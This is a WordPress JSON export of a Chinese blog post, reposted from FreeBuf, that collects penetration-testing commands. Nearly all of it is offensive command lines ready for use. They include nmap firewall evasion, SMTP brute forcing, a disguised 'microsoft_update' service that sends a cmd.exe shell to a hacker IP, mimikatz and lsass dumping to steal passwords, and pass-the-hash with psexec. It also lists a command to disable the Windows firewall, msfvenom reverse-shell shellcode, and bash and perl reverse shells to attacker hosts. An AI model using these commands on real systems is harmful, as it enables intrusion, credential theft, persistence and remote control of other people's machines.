{"id":305,"date":"2017-02-12T17:19:18","date_gmt":"2017-02-12T09:19:18","guid":{"rendered":"http:\/\/www.thinkmesh.net\/?p=305"},"modified":"2017-02-12T17:47:35","modified_gmt":"2017-02-12T09:47:35","slug":"%e6%b8%97%e9%80%8f%e6%b5%8b%e8%af%95%e5%b7%a5%e5%85%b7%e5%90%88%e9%9b%86","status":"publish","type":"post","link":"http:\/\/www.thinkmesh.net\/?p=305","title":{"rendered":"\u6e17\u900f\u6d4b\u8bd5\u5de5\u5177\u5408\u96c6"},"content":{"rendered":"
\u6587\u7ae0\u5185\u5bb9\u6765\u81ea\u4e8e\u7f51\u7edc\uff0c\u5177\u4f53\u5730\u5740\u4e3aFreeBuf\u9ed1\u5ba2\u4e0e\u6781\u5ba2\uff08FreeBuf.COM\uff09<\/a><\/div>\n

\"\"<\/a><\/p>\n

NMAP \u626b\u63cf\u7b56\u7565<\/h2>\n
\r\n# \u9002\u7528\u6240\u6709\u5927\u5c0f\u7f51\u7edc\u6700\u597d\u7684 nmap \u626b\u63cf\u7b56\u7565\r\n\r\n# \u4e3b\u673a\u53d1\u73b0\uff0c\u751f\u6210\u5b58\u6d3b\u4e3b\u673a\u5217\u8868\r\n$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0\/24\r\n$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt\r\n\r\n# \u7aef\u53e3\u53d1\u73b0\uff0c\u53d1\u73b0\u5927\u90e8\u5206\u5e38\u7528\u7aef\u53e3\r\n# http:\/\/nmap.org\/presentations\/BHDC08\/bhdc08-slides-fyodor.pdf\r\n$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt\r\n$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt\r\n$ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt\r\n\r\n# \u7aef\u53e3\u53d1\u73b0\uff0c\u53d1\u73b0\u5168\u90e8\u7aef\u53e3\uff0c\u4f46 UDP \u7aef\u53e3\u7684\u626b\u63cf\u4f1a\u975e\u5e38\u6162\r\n$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt\r\n$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt\r\n\r\n# \u663e\u793a TCP\\UDP \u7aef\u53e3\r\n$ grep "open" FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '\/' |xargs | sed 's\/ \/,\/g'|awk '{print "T:"$0}'\r\n$ grep "open" FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '\/' |xargs | sed 's\/ \/,\/g'|awk '{print "U:"$0}'\r\n\r\n# \u4fa6\u6d4b\u670d\u52a1\u7248\u672c\r\n$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt\r\n\r\n# \u626b\u505a\u7cfb\u7edf\u626b\u63cf\r\n$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt\r\n\r\n# \u7cfb\u7edf\u548c\u670d\u52a1\u68c0\u6d4b\r\n$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt\r\n<\/pre>\n
Nmap\u8eb2\u907f\u9632\u706b\u5899<\/h2>\n
\r\n# \u5206\u6bb5\r\n$ nmap -f\r\n\r\n# \u4fee\u6539\u9ed8\u8ba4 MTU \u5927\u5c0f\uff0c\u4f46\u5fc5\u987b\u4e3a 8 \u7684\u500d\u6570(8,16,24,32 \u7b49\u7b49)\r\n$ nmap --mtu 24\r\n\r\n# \u751f\u6210\u968f\u673a\u6570\u91cf\u7684\u6b3a\u9a97\r\n$ nmap -D RND:10 [target]\r\n\r\n# \u624b\u52a8\u6307\u5b9a\u6b3a\u9a97\u4f7f\u7528\u7684 IP\r\n$ nmap -D decoy1,decoy2,decoy3 etc.\r\n\r\n# \u50f5\u5c38\u7f51\u7edc\u626b\u63cf, \u9996\u5148\u9700\u8981\u627e\u5230\u50f5\u5c38\u7f51\u7edc\u7684IP\r\n$ nmap -sI [Zombie IP] [Target IP]\r\n\r\n# \u6307\u5b9a\u6e90\u7aef\u53e3\u53f7\r\n$ nmap --source-port 80 IP\r\n\r\n# \u5728\u6bcf\u4e2a\u626b\u63cf\u6570\u636e\u5305\u540e\u8ffd\u52a0\u968f\u673a\u6570\u91cf\u7684\u6570\u636e\r\n$ nmap --data-length 25 IP\r\n\r\n# MAC \u5730\u5740\u6b3a\u9a97\uff0c\u53ef\u4ee5\u751f\u6210\u4e0d\u540c\u4e3b\u673a\u7684 MAC \u5730\u5740\r\n$ nmap --spoof-mac Dell\/Apple\/3Com IP\r\n<\/pre>\n
Nmap\u7684Web\u6f0f\u6d1e\u626b\u63cf<\/h2>\n
\r\ncd \/usr\/share\/nmap\/scripts\/\r\nwget http:\/\/www.computec.ch\/projekte\/vulscan\/download\/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz\r\nnmap -sS -sV --script=vulscan\/vulscan.nse target\r\nnmap -sS -sV --script=vulscan\/vulscan.nse \u2013script-args vulscandb=scipvuldb.csv target\r\nnmap -sS -sV --script=vulscan\/vulscan.nse \u2013script-args vulscandb=scipvuldb.csv -p80 target\r\nnmap -PN -sS -sV --script=vulscan \u2013script-args vulscancorrelation=1 -p80 target\r\nnmap -sV --script=vuln target\r\nnmap -PN -sS -sV --script=all \u2013script-args vulscancorrelation=1 target\r\n<\/pre>\n
\u4f7f\u7528 DIRB \u7206\u7834\u76ee\u5f55<\/h2>\n
\u6ce8\uff1aDIRB \u662f\u4e00\u4e2a\u4e13\u95e8\u7528\u4e8e\u7206\u7834\u76ee\u5f55\u7684\u5de5\u5177\uff0c\u5728 Kali \u4e2d\u9ed8\u8ba4\u5df2\u7ecf\u5b89\u88c5\uff0c\u7c7b\u4f3c\u5de5\u5177\u8fd8\u6709\u56fd\u5916\u7684patator\uff0cdirsearch\uff0cDirBuster\uff0c \u56fd\u5185\u7684\u5fa1\u5251\u7b49\u7b49\u3002<\/p>\n
\r\ndirb http:\/\/IP:PORT \/usr\/share\/dirb\/wordlists\/common.txt\r\n<\/pre>\n
Patator \u2013 \u5168\u80fd\u66b4\u529b\u7834\u89e3\u6d4b\u8bd5\u5de5\u5177<\/h2>\n
\r\n# git clone https:\/\/github.com\/lanjelot\/patator.git \/usr\/share\/patator\r\n\r\n# SMTP \u7206\u7834\r\n$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=\/usr\/share\/john\/password.lst\r\n$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=\/usr\/share\/john\/password.lst 1=\/usr\/share\/john\/usernames.lst\r\n$ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=\/usr\/share\/john\/password.lst 1=\/usr\/share\/john\/usernames.lst\r\n$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=\/usr\/share\/john\/password.lst -x ignore:fgrep='incorrect password or account name'\r\n<\/pre>\n
\u4f7f\u7528 Fierce \u7206\u7834 DNS<\/h2>\n
\u6ce8\uff1aFierce \u4f1a\u68c0\u67e5 DNS \u670d\u52a1\u5668\u662f\u5426\u5141\u8bb8\u533a\u57df\u4f20\u9001\u3002\u5982\u679c\u5141\u8bb8\uff0c\u5c31\u4f1a\u8fdb\u884c\u533a\u57df\u4f20\u9001\u5e76\u901a\u77e5\u7528\u6237\uff0c\u5982\u679c\u4e0d\u5141\u8bb8\uff0c\u5219\u53ef\u4ee5\u901a\u8fc7\u67e5\u8be2 DNS \u670d\u52a1\u5668\u679a\u4e3e\u4e3b\u673a\u540d\u3002\u7c7b\u4f3c\u5de5\u5177\uff1asubDomainsBrute \u548c SubBrute \u7b49\u7b49<\/p>\n
\r\n# http:\/\/ha.ckers.org\/fierce\/\r\n$ .\/fierce.pl -dns example.com\r\n$ .\/fierce.pl \u2013dns example.com \u2013wordlist myWordList.txt\r\n<\/pre>\n
\u4f7f\u7528 Nikto \u626b\u63cf Web \u670d\u52a1<\/h2>\n
\r\nnikto -C all -h http:\/\/IP\r\n<\/pre>\n
\u626b\u63cf WordPress<\/h2>\n
\r\ngit clone https:\/\/github.com\/wpscanteam\/wpscan.git && cd wpscan\r\n.\/wpscan \u2013url http:\/\/IP\/ \u2013enumerate p\r\n<\/pre>\n
HTTP \u6307\u7eb9\u8bc6\u522b<\/h2>\n
\r\nwget http:\/\/www.net-square.com\/_assets\/httprint_linux_301.zip && unzip httprint_linux_301.zip\r\ncd httprint_301\/linux\/\r\n.\/httprint -h http:\/\/IP -s signatures.txt\r\n<\/pre>\n
\u4f7f\u7528 Skipfish \u626b\u63cf<\/h2>\n
\u6ce8\uff1aSkipfish \u662f\u4e00\u6b3e Web \u5e94\u7528\u5b89\u5168\u4fa6\u67e5\u5de5\u5177\uff0cSkipfish \u4f1a\u5229\u7528\u9012\u5f52\u722c\u866b\u548c\u57fa\u4e8e\u5b57\u5178\u7684\u63a2\u9488\u751f\u6210\u4e00\u5e45\u4ea4\u4e92\u5f0f\u7f51\u7ad9\u5730\u56fe\uff0c\u6700\u7ec8\u751f\u6210\u7684\u5730\u56fe\u4f1a\u5728\u901a\u8fc7\u5b89\u5168\u68c0\u67e5\u540e\u8f93\u51fa\u3002<\/p>\n
\r\nskipfish -m 5 -LY -S \/usr\/share\/skipfish\/dictionaries\/complete.wl -o .\/skipfish2 -u http:\/\/IP\r\n<\/pre>\n
\u4f7f\u7528 NC \u626b\u63cf<\/h2>\n
\r\nnc -v -w 1 target -z 1-1000\r\nfor i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done\r\n<\/pre>\n
Unicornscan<\/h2>\n
\u6ce8\uff1aUnicornscan \u662f\u4e00\u4e2a\u4fe1\u606f\u6536\u96c6\u548c\u5b89\u5168\u5ba1\u8ba1\u7684\u5de5\u5177\u3002<\/p>\n
\r\nus -H -msf -Iv 192.168.56.101 -p 1-65535\r\nus -H -mU -Iv 192.168.56.101 -p 1-65535\r\n\r\n-H \u5728\u751f\u6210\u62a5\u544a\u9636\u6bb5\u89e3\u6790\u4e3b\u673a\u540d\r\n-m \u626b\u63cf\u7c7b\u578b (sf - tcp, U - udp)\r\n-Iv - \u8be6\u7ec6\r\n<\/pre>\n
\u4f7f\u7528 Xprobe2 \u8bc6\u522b\u64cd\u4f5c\u7cfb\u7edf\u6307\u7eb9<\/h2>\n
\r\nxprobe2 -v -p tcp:80:open IP\r\n<\/pre>\n
\u679a\u4e3e SNMP<\/h2>\n
\r\nsnmpget -v 1 -c public IP\r\nsnmpwalk -v 1 -c public IP\r\nsnmpbulkwalk -v2c -c public -Cn0 -Cr10 IP\r\n<\/pre>\n
\u5b9e\u7528\u7684 Windows cmd \u547d\u4ee4<\/h2>\n
\r\nnet localgroup Users\r\nnet localgroup Administrators\r\nsearch dir\/s *.doc\r\nsystem("start cmd.exe \/k $cmd")\r\nsc create microsoft_update binpath="cmd \/K start c:\\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore\r\n\/c C:\\nc.exe -e c:\\windows\\system32\\cmd.exe -vv 23.92.17.103 7779\r\nmimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"\r\nProcdump.exe -accepteula -ma lsass.exe lsass.dmp\r\nmimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"\r\nC:\\temp\\procdump.exe -accepteula -ma lsass.exe lsass.dmp 32 \u4f4d\u7cfb\u7edf\r\nC:\\temp\\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp 64 \u4f4d\u7cfb\u7edf\r\n<\/pre>\n
PuTTY \u8fde\u63a5\u96a7\u9053<\/h2>\n
\r\n\u8f6c\u53d1\u8fdc\u7a0b\u7aef\u53e3\u5230\u76ee\u6807\u5730\u5740\r\nplink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP\r\n<\/pre>\n
Meterpreter \u7aef\u53e3\u8f6c\u53d1<\/h2>\n
\r\n# https:\/\/www.offensive-security.com\/metasploit-unleashed\/portfwd\/\r\n# \u8f6c\u53d1\u8fdc\u7a0b\u7aef\u53e3\u5230\u76ee\u6807\u5730\u5740\r\nmeterpreter > portfwd add \u2013l 3389 \u2013p 3389 \u2013r 172.16.194.141\r\nkali > rdesktop 127.0.0.1:3389\r\n<\/pre>\n
\u5173\u95ed Windows \u9632\u706b\u5899<\/h2>\n
\r\nnetsh firewall set opmode disable\r\n<\/pre>\n
\u4f7f\u7528 Mimikatz<\/h2>\n
\u83b7\u53d6 Windows \u660e\u6587\u7528\u6237\u540d\u5bc6\u7801\u3002<\/p>\n
\r\ngit clone https:\/\/github.com\/gentilkiwi\/mimikatz.git\r\nprivilege::debug\r\nsekurlsa::logonPasswords full\r\n<\/pre>\n
\u83b7\u53d6\u54c8\u5e0c\u503c<\/h2>\n
\r\ngit clone https:\/\/github.com\/byt3bl33d3r\/pth-toolkit\r\npth-winexe -U hash \/\/IP cmd\r\n\r\n\u6216\u8005\r\n\r\napt-get install freerdp-x11\r\nxfreerdp \/u:offsec \/d:win2012 \/pth:HASH \/v:IP\r\n\r\n\u5728\u6216\u8005\r\n\r\nmeterpreter > run post\/windows\/gather\/hashdump\r\nAdministrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::\r\nmsf > use exploit\/windows\/smb\/psexec\r\nmsf exploit(psexec) > set payload windows\/meterpreter\/reverse_tcp\r\nmsf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c\r\nmsf exploit(psexec) > exploit\r\nmeterpreter > shell\r\n<\/pre>\n
\u4f7f\u7528 Hashcat \u7834\u89e3\u5bc6\u7801<\/h2>\n
\r\nhashcat -m 400 -a 0 hash \/root\/rockyou.txt\r\n<\/pre>\n
\u4f7f\u7528 NC \u6293\u53d6 Banner \u4fe1\u606f<\/h2>\n
\r\nnc 192.168.0.10 80\r\nGET \/ HTTP\/1.1\r\nHost: 192.168.0.10\r\nUser-Agent: Mozilla\/4.0\r\nReferrer: www.example.com\r\n<enter>\r\n<enter>\r\n<\/pre>\n
\u4f7f\u7528 NC \u5728 Windows \u4e0a\u53cd\u5f39 shell<\/h2>\n
\r\nc:>nc -Lp 31337 -vv -e cmd.exe\r\nnc 192.168.0.10 31337\r\nc:>nc example.com 80 -e cmd.exe\r\nnc -lp 80\r\n\r\nnc -lp 31337 -e \/bin\/bash\r\nnc 192.168.0.10 31337\r\nnc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i\/o error) 1-1000\r\n<\/pre>\n
Python shell<\/h2>\n
\r\npython -c 'import pty;pty.spawn("\/bin\/bash")'\r\n<\/pre>\n
Python\\Ruby\\PHP HTTP \u670d\u52a1\u5668<\/h2>\n
\r\npython2 -m SimpleHTTPServer\r\npython3 -m http.server\r\nruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :D\r\n ocumentRoot => Dir.pwd).start"\r\nphp -S 0.0.0.0:8888\r\n<\/pre>\n
\u83b7\u53d6\u8fdb\u7a0b\u5bf9\u5e94\u7684 PID<\/h2>\n
\r\nfuser -nv tcp 80\r\nfuser -k -n tcp 80\r\n<\/pre>\n
SSH \u7a7f\u900f<\/h2>\n
\r\nssh -D 127.0.0.1:1080 -p 22 user@IP\r\nAdd socks4 127.0.0.1 1080 in \/etc\/proxychains.conf\r\nproxychains commands target\r\n<\/pre>\n
SSH \u7a7f\u900f\u4ece\u4e00\u4e2a\u7f51\u7edc\u5230\u53e6\u4e00\u4e2a\u7f51\u7edc<\/h2>\n
\r\nssh -D 127.0.0.1:1080 -p 22 user1@IP1\r\nAdd socks4 127.0.0.1 1080 in \/etc\/proxychains.conf\r\nproxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2\r\nAdd socks4 127.0.0.1 1081 in \/etc\/proxychains.conf\r\nproxychains commands target\r\n<\/pre>\n
\u4f7f\u7528 metasploit \u8fdb\u884c\u7a7f\u900f<\/h2>\n
\r\nroute add X.X.X.X 255.255.255.0 1\r\nuse auxiliary\/server\/socks4a\r\nrun\r\nproxychains msfcli windows\/* PAYLOAD=windows\/meterpreter\/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E\r\n\r\n\u6216\u8005\r\n\r\n# https:\/\/www.offensive-security.com\/metasploit-unleashed\/pivoting\/\r\nmeterpreter > ipconfig\r\nIP Address  : 10.1.13.3\r\nmeterpreter > run autoroute -s 10.1.13.0\/24\r\nmeterpreter > run autoroute -p\r\n10.1.13.0          255.255.255.0      Session 1\r\nmeterpreter > Ctrl+Z\r\nmsf auxiliary(tcp) > use exploit\/windows\/smb\/psexec\r\nmsf exploit(psexec) > set RHOST 10.1.13.2\r\nmsf exploit(psexec) > exploit\r\nmeterpreter > ipconfig\r\nIP Address  : 10.1.13.2\r\n<\/pre>\n
Linux \u5e38\u7528\u5b89\u5168\u547d\u4ee4<\/h2>\n
\r\n# \u4f7f\u7528 uid \u67e5\u627e\u5bf9\u5e94\u7684\u7a0b\u5e8f\r\nfind \/ -uid 0 -perm -4000\r\n\r\n# \u67e5\u627e\u54ea\u91cc\u62e5\u6709\u5199\u6743\u9650\r\nfind \/ -perm -o=w\r\n\r\n# \u67e5\u627e\u540d\u79f0\u4e2d\u5305\u542b\u70b9\u548c\u7a7a\u683c\u7684\u6587\u4ef6\r\nfind \/ -name " " -print\r\nfind \/ -name ".." -print\r\nfind \/ -name ". " -print\r\nfind \/ -name " " -print\r\n\r\n# \u67e5\u627e\u4e0d\u5c5e\u4e8e\u4efb\u4f55\u4eba\u7684\u6587\u4ef6\r\nfind \/ -nouser\r\n\r\n# \u67e5\u627e\u672a\u94fe\u63a5\u7684\u6587\u4ef6\r\nlsof +L1\r\n\r\n# \u83b7\u53d6\u8fdb\u7a0b\u6253\u5f00\u7aef\u53e3\u7684\u4fe1\u606f\r\nlsof -i\r\n\r\n# \u770b\u770b ARP \u8868\u4e2d\u662f\u5426\u6709\u5947\u602a\u7684\u4e1c\u897f\r\narp -a\r\n\r\n# \u67e5\u770b\u6240\u6709\u8d26\u6237\r\ngetent passwd\r\n\r\n# \u67e5\u770b\u6240\u6709\u7528\u6237\u7ec4\r\ngetent group\r\n\r\n# \u5217\u4e3e\u6240\u6709\u7528\u6237\u7684 crontabs\r\nfor user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done\r\n\r\n# \u751f\u6210\u968f\u673a\u5bc6\u7801\r\ncat \/dev\/urandom| tr -dc \u2018a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=\u2019|fold -w 12| head -n 4\r\n\r\n# \u67e5\u627e\u6240\u6709\u4e0d\u53ef\u4fee\u6539\u7684\u6587\u4ef6\r\nfind . | xargs -I file lsattr -a file 2>\/dev\/null | grep \u2018^\u2026.i\u2019\r\n\r\n# \u4f7f\u6587\u4ef6\u4e0d\u53ef\u4fee\u6539\r\nchattr -i file\r\n<\/pre>\n
Windows \u7f13\u51b2\u533a\u6ea2\u51fa\u5229\u7528\u547d\u4ee4<\/h2>\n
\r\nmsfvenom -p windows\/shell_bind_tcp -a x86 --platform win -b "\\x00" -f c\r\nmsfvenom -p windows\/meterpreter\/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86\/shikata_ga_nai -b "\\x00" -f c\r\n\r\nCOMMONLY USED BAD CHARACTERS:\r\n\\x00\\x0a\\x0d\\x20                              For http request\r\n\\x00\\x0a\\x0d\\x20\\x1a\\x2c\\x2e\\3a\\x5c           Ending with (0\\n\\r_)\r\n\r\n# \u5e38\u7528\u547d\u4ee4:\r\npattern create\r\npattern offset (EIP Address)\r\npattern offset (ESP Address)\r\nadd garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )\r\n\r\n!pvefindaddr pattern_create 5000\r\n!pvefindaddr suggest\r\n!pvefindaddr modules\r\n!pvefindaddr nosafeseh\r\n\r\n!mona config -set workingfolder C:\\Mona\\%p\r\n!mona config -get workingfolder\r\n!mona mod\r\n!mona bytearray -b "\\x00\\x0a"\r\n!mona pc 5000\r\n!mona po EIP\r\n!mona suggest\r\n<\/pre>\n
GDB Debugger \u5e38\u7528\u547d\u4ee4<\/h2>\n
\r\n# \u8bbe\u7f6e\u65ad\u70b9\r\nbreak *_start\r\n\r\n# \u6267\u884c\u4e0b\u4e00\u4e2a\u547d\u4ee4\r\nnext\r\nstep\r\nn\r\ns\r\n\r\n# \u7ee7\u7eed\u6267\u884c\r\ncontinue\r\nc\r\n\r\n# \u6570\u636e\r\nchecking 'REGISTERS' and 'MEMORY'\r\n\r\n# \u663e\u793a\u5bc4\u5b58\u5668\u7684\u503c: (Decimal,Binary,Hex)\r\nprint \/d \u2013> Decimal\r\nprint \/t \u2013> Binary\r\nprint \/x \u2013> Hex\r\nO\/P :\r\n(gdb) print \/d $eax\r\n$17 = 13\r\n(gdb) print \/t $eax\r\n$18 = 1101\r\n(gdb) print \/x $eax\r\n$19 = 0xd\r\n(gdb)\r\n\r\n# \u663e\u793a\u7279\u5b9a\u5185\u5b58\u5730\u5740\u7684\u503c\r\ncommand : x\/nyz (Examine)\r\nn \u2013> Number of fields to display ==>\r\ny \u2013> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)\r\nz \u2013> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)\r\n<\/pre>\n
BASH \u53cd\u5f39 Shell<\/h2>\n
\r\nbash -i >& \/dev\/tcp\/X.X.X.X\/443 0>&1\r\n\r\nexec \/bin\/bash 0&0 2>&0\r\nexec \/bin\/bash 0&0 2>&0\r\n\r\n0<&196;exec 196<>\/dev\/tcp\/attackerip\/4444; sh <&196 >&196 2>&196\r\n\r\n0<&196;exec 196<>\/dev\/tcp\/attackerip\/4444; sh <&196 >&196 2>&196\r\n\r\nexec 5<>\/dev\/tcp\/attackerip\/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done\r\nexec 5<>\/dev\/tcp\/attackerip\/4444\r\n\r\ncat <&5 | while read line; do $line 2>&5 >&5; done # or:\r\nwhile read line 0<&5; do $line 2>&5 >&5; done\r\n\r\n\/bin\/bash -i > \/dev\/tcp\/attackerip\/8080 0<&1 2>&1\r\n\/bin\/bash -i > \/dev\/tcp\/X.X.X.X\/443 0<&1 2>&1\r\n<\/pre>\n
PERL \u53cd\u5f39 Shell<\/h2>\n
\r\nperl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\r\n\r\n# Win \u5e73\u53f0\r\nperl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\r\nperl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("\/bin\/sh -i");};\u2019\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
\u6587\u7ae0\u5185\u5bb9\u6765\u81ea\u4e8e\u7f51\u7edc\uff0c\u5177\u4f53\u5730\u5740\u4e3aFreeBuf\u9ed1\u5ba2\u4e0e\u6781\u5ba2\uff08FreeBuf.COM\uff09 NMAP \u626b\u63cf\u7b56\u7565 # \u9002\u7528 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13,6],"tags":[31],"_links":{"self":[{"href":"http:\/\/www.thinkmesh.net\/index.php?rest_route=\/wp\/v2\/posts\/305"}],"collection":[{"href":"http:\/\/www.thinkmesh.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.thinkmesh.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.thinkmesh.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.thinkmesh.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=305"}],"version-history":[{"count":22,"href":"http:\/\/www.thinkmesh.net\/index.php?rest_route=\/wp\/v2\/posts\/305\/revisions"}],"predecessor-version":[{"id":328,"href":"http:\/\/www.thinkmesh.net\/index.php?rest_route=\/wp\/v2\/posts\/305\/revisions\/328"}],"wp:attachment":[{"href":"http:\/\/www.thinkmesh.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=305"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.thinkmesh.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=305"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.thinkmesh.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=305"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}